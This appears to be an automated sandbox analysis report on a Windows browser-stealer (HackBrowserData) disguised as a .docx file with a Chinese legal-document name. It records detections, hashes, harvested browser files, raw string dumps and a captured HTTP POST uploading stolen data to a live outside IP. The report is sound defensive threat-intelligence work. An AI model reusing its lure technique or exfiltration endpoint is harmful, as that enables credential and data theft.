Windows Analysis Report
#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Overview

General Information

Sample name:	#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe renamed because original name is a hash value
Original sample name:	.docx.exe
Analysis ID:	1533050
MD5:	daf21b9d206ce16fc3bd087abd0c6389
SHA1:	76c67b3413830e45b0a5d938fb7976d47da10579
SHA256:	a62c290374a53ae0e30ba18422ead75f2a271a4b58cd6204940112364246d7ac
Infos:

Detection

HackBrowser

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Yara detected HackBrowser

AI detected suspicious sample

Tries to harvest and steal browser information (history, passwords, etc)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Communication To Uncommon Destination Ports

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
HackBrowserData	Browser information stealer, written in Go.	No Attribution	https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign	https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	ReversingLabs: Detection: 54%
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Virustotal: Detection: 50%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49704

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 43.248.8.109:8888

Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109
Source: unknown	TCP traffic detected without corresponding DNS query: 43.248.8.109

Source: unknown

HTTP traffic detected: POST /upload HTTP/1.1Host: 43.248.8.109:8888User-Agent: Go-http-client/1.1Content-Length: 908Content-Type: multipart/form-data; boundary=20d5805c7f211953f7ac5355ef88de92a98d5cde4287aa1efa9f46f5ca46Accept-Encoding: gzipData Raw: 2d 2d 32 30 64 35 38 30 35 63 37 66 32 31 31 39 35 33 66 37 61 63 35 33 35 35 65 66 38 38 64 65 39 32 61 39 38 64 35 63 64 65 34 32 38 37 61 61 31 65 66 61 39 66 34 36 66 35 63 61 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 65 6e 63 72 79 70 74 65 64 2d 34 31 39 36 30 39 33 38 32 30 2e 64 61 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a4 1d 4b 2c e7 6a 36 63 91 af fc 60 a9 de 62 97 8c 65 20 42 43 02 22 a4 90 66 5f f9 f0 59 9f 75 03 c4 98 fb b6 f7 53 45 5e 96 68 1c 31 ed 5d 14 d2 6d ac a8 69 10 be 91 05 34 98 d5 8e 5b e0 ae ca 26 11 24 ab 58 4a 72 28 44 cb 3b 8e e1 79 c2 26 69 b1 ce 69 bc 37 87 a5 e3 7f 2c e7 56 f5 65 41 c0 07 ad 95 38 15 15 11 b4 a0 8d 9a 9a 36 58 af af d6 fd b5 47 93 45 69 ba bd 41 44 e2 c2 0c 02 0f 8f 81 8c 47 ce 77 5d 10 b5 44 69 e3 9a 86 26 0a 30 ab 82 1e d1 be 09 3c fc 20 e0 15 c2 5a 0b bb de 12 f0 dc a7 5b e8 5e 0f da 6d ae e6 35 ec 50 7c b7 0c 09 5c 7f 8e 0c 9b 22 31 e9 ce c5 fb df 79 86 0a f5 db 96 ef 3d e1 29 6b 5b e3 d1 81 6d 43 f6 9c 63 e6 a8 eb 0f 80 42 ce 93 63 e2 86 90 4c c2 14 50 56 f3 ed ed 52 45 f0 89 52 c2 0a 4e 84 3b 5e cb c5 9c 4d eb 61 fe 9c 1c 1b af aa 6c cf fd f5 a3 4e 82 69 5b 65 74 1c 5a dc 01 79 e4 c5 6f 22 04 1c 3c 72 af bb 90 6d 0b 17 71 ec 44 53 e0 4b 8d 8e ee d8 b5 17 4e f8 04 5c cb 68 51 49 04 57 2f 77 7c 33 cd e3 49 9a 98 0b 8c 31 ff 19 93 88 41 a3 de eb a4 3a 14 41 05 59 65 b7 4a 80 77 9c 53 f0 6e d4 c3 4c 50 a9 e5 dd e5 1b 3c b3 1d c9 34 7b 9a 15 9e b1 65 19 fa 95 57 17 83 42 0c f8 d3 3e ef 98 ba 8a f5 5e fc 35 e5 7a 5f 18 30 08 6c 23 03 95 ce bb 2d 1d 6e 91 67 f0 fe 76 d1 40 98 1e fd 07 9d cc 93 03 08 c1 66 67 68 bc ed a5 77 e9 ed 6a 3e 91 09 a7 1d 12 3e 6c 0d f7 26 b3 95 7e f6 a9 94 7b 2e af 0a 11 83 85 53 60 8b 22 ba 37 d6 45 f3 d1 d9 af f6 98 c8 50 02 4e da b4 05 42 11 ff 01 b1 2f 05 d3 f1 09 da cb af b9 82 c6 5d 2f 09 6e ba 47 b4 6c f1 ac 3f fc 3d 84 4c 6f 9e 10 50 aa 8e d1 06 83 41 3d a4 4c eb 7d 60 00 14 02 13 24 61 14 f9 e4 49 42 d5 1d ad c7 07 31 17 a5 63 60 e2 b5 33 21 2f b3 9f 18 17 46 96 fa 6e eb a6 e2 23 5a f2 50 68 bf 10 66 14 fe d9 01 a0 ac 27 b2 6d 1e 00 5b 67 b8 82 0b 0b 1d 94 c6 5a 84 af ca 7f ae 0c 97 bd 10 c6 6c 8a b9 e7 ba c8 93 44 e1 b6 7c 03 9f 95 44 3e 76 cd 93 30 32 99 10 58 c4 01 6a 70 d8 b5 f0 82 81 02 fa c6 d5 0a 27 5a a9 db 8a 85 36 d9 45 f5 bb 21 23 49 84 e2 f5 a8 d9 e2 f0 0d 0a 2d 2d 32 30 64 35 38 30 35 63 37 66 32 31 31 39 35 33 66 37 61 63 35 33 35 35 65 66 38 38 64 65 39 32 61 39 38 64 35 63 64 65 34 32 38 37 61 61 31 65 66 61 39 66 34 36 66 35 63 61 34 36 2d 2d 0d 0a Data Ascii: --20d5805c7f211953f7ac

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: http://43.248.8.109:8888/uploadfmt:
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: http://file://mailto:http://BINARY-x0X03.46.0
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://chrome.google.com/webstore
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://chrome.google.com/webstore/detail/PrintableString
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://docs.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://drive.google.com/
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://github.com/moonD4rk/HackBrowserDataCompactions
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000158000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C00015E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureC:
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C000082000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2117228152.000000C0000C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdsync:
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Secure Preferences_9.temp.0.dr	String found in binary or memory: https://www.google.com/
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2094393897.000000C0001D8000.00000004.00001000.00020000.00000000.sdmp, Web Data_6.temp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2120309503.000000C000BDB000.00000004.00001000.00020000.00000000.sdmp, places.sqlite_16.temp.0.dr, places.sqlite_15.temp.0.dr, places.sqlite_17.temp.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: classification engine

Classification label: mal80.troj.spyw.evad.winEXE@1/25@0/1

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File created: C:\Users\user\AppData\Roaming\hack

Jump to behavior

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File created: C:\Users\user\AppData\Local\Temp\Session Storage_8.temp

Jump to behavior

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

File opened: C:\Windows\system32\fdbf095845fec0d5191b65c42ea175df5321dde82964753c62540ae72ea57c83AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2090778427.0000017DE6495000.00000004.00001000.00020000.00000000.sdmp, #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000003.2092505050.0000017DE6525000.00000004.00001000.00020000.00000000.sdmp, Login Data_1.temp.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe, 00000000.00000002.2116227680.00000000015DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	ReversingLabs: Detection: 54%
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Virustotal: Detection: 50%

Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: leveldb/memdb: iterator releasedleveldb/table: iterator releasedbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecrypto/aes: output not full blockpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qerror creating output file %s: %werror writing data to file %s: %wcomplete -r -c %s -n '%s' -a '%s'visibleGlobalFlagCategoryTemplateskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length slice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangego package net: confVal.netCgo = empty hex number for chunk lengthtoo many levels of symbolic linksInitializeProcThreadAttributeListwaiting for unsupported file typeinvalid value %q for flag -%s: %vincompatible types for comparisoncannot index slice/array with nilcrypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/des: output not full blocktoo many Answers to pack (>65535)DES3Decrypt: ciphertext too shortsql: connection is already closedfailed to get main source db nameinsufficient memory for aggregateencoding: missing byte order mark&CounterClockwiseContourIntegral;regexp: unhandled case in compilescalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "CString: cannot allocate %d bytesSCGQUUSGSCOMPRKCYMSPMSRBATFMYTATNmemdb@flush committed F
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: leveldb/memdb: iterator releasedleveldb/table: iterator releasedbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecrypto/aes: output not full blockpseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolhttp: CloseIdleConnections calledapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qerror creating output file %s: %werror writing data to file %s: %wcomplete -r -c %s -n '%s' -a '%s'visibleGlobalFlagCategoryTemplateskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length slice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetls: failed to write to key log: tls: invalid server finished hashtls: unexpected ServerKeyExchangego package net: confVal.netCgo = empty hex number for chunk lengthtoo many levels of symbolic linksInitializeProcThreadAttributeListwaiting for unsupported file typeinvalid value %q for flag -%s: %vincompatible types for comparisoncannot index slice/array with nilcrypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagescrypto/des: output not full blocktoo many Answers to pack (>65535)DES3Decrypt: ciphertext too shortsql: connection is already closedfailed to get main source db nameinsufficient memory for aggregateencoding: missing byte order mark&CounterClockwiseContourIntegral;regexp: unhandled case in compilescalar has high bit set illegallyindefinite length found (not DER)struct contains unexported fieldsGODEBUG sys/cpu: can not enable "CString: cannot allocate %d bytesSCGQUUSGSCOMPRKCYMSPMSRBATFMYTATNmemdb@flush committed F
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: failed to construct HKDF label: %sillegal base64 data at input byte too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: flag provided but not defined: -%scan't evaluate field %s in type %scan't handle %s for arg of type %svalue is nil; should be of type %scrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapsql: expected %d arguments, got %dunpaired removeDep: no deps for %Tdecrypt chromium credit card errorcannot find extensions in settingssemaphore: released more than heldinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizedriver: remove argument from queryunsupported type %T, a slice of %sleveldb/table: invalid slice rangesnappy: decoded block is too largesnappy: unsupported literal lengthunsigned integer overflow on token 2006-01-02T15:04:05.999999999Z07:00form-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0error creating zip entry for %s: %werror removing original file %s: %whash/crc32: invalid hash state sizestrings.Reader.Seek: invalid whencenon-positive interval for NewTickerflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9'_' must separate successive digits" is unexported but missing PkgPathreflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=mime: bogus characters after %%: %qunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineexpected unsigned integer; found %snon-comparable types %s: %v, %s: %vbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)unpaired removeDep: no %T dep on %T2006-01-02 15:04:05.999999999-07:002006-01-02T15:04:05.999999999-07:00MakeAggregate function returned niltransform: short destination bufferrange can only initialize variablesP224 point is the point at infinityP256 point is the point
Source: #U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	String found in binary or memory: failed to construct HKDF label: %sillegal base64 data at input byte too many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: flag provided but not defined: -%scan't evaluate field %s in type %scan't handle %s for arg of type %svalue is nil; should be of type %scrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapsql: expected %d arguments, got %dunpaired removeDep: no deps for %Tdecrypt chromium credit card errorcannot find extensions in settingssemaphore: released more than heldinvalid nested repetition operatorinvalid or unsupported Perl syntaxinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizedriver: remove argument from queryunsupported type %T, a slice of %sleveldb/table: invalid slice rangesnappy: decoded block is too largesnappy: unsupported literal lengthunsigned integer overflow on token 2006-01-02T15:04:05.999999999Z07:00form-data; name="%s"; filename="%s"http: server closed idle connectionCONTINUATION frame with stream ID 0error creating zip entry for %s: %werror removing original file %s: %whash/crc32: invalid hash state sizestrings.Reader.Seek: invalid whencenon-positive interval for NewTickerflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9'_' must separate successive digits" is unexported but missing PkgPathreflect.MakeSlice of non-slice typepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o 